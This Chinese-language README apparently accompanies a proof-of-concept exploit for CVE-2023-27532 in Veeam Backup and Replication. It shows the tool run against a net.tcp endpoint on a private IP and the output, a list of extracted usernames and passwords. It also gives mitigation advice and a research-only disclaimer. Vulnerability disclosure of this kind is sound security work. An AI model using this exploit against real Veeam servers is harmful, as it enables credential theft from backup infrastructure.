针对影响 Veeam Backup and Replication 的 CVE-2023-27532 的 PoC
关于漏洞的技术根因分析可以在我们的博客中找到: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
此 PoC 利用不安全的 API 端点来提取凭据。
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
更新到最新版本或按照 Veeam 建议中的说明进行缓解
本软件纯粹为学术研究和开发有效的防御技术而创建,除非明确授权,否则不应用于攻击系统。项目维护者对软件的滥用不承担任何责任。请负责任地使用。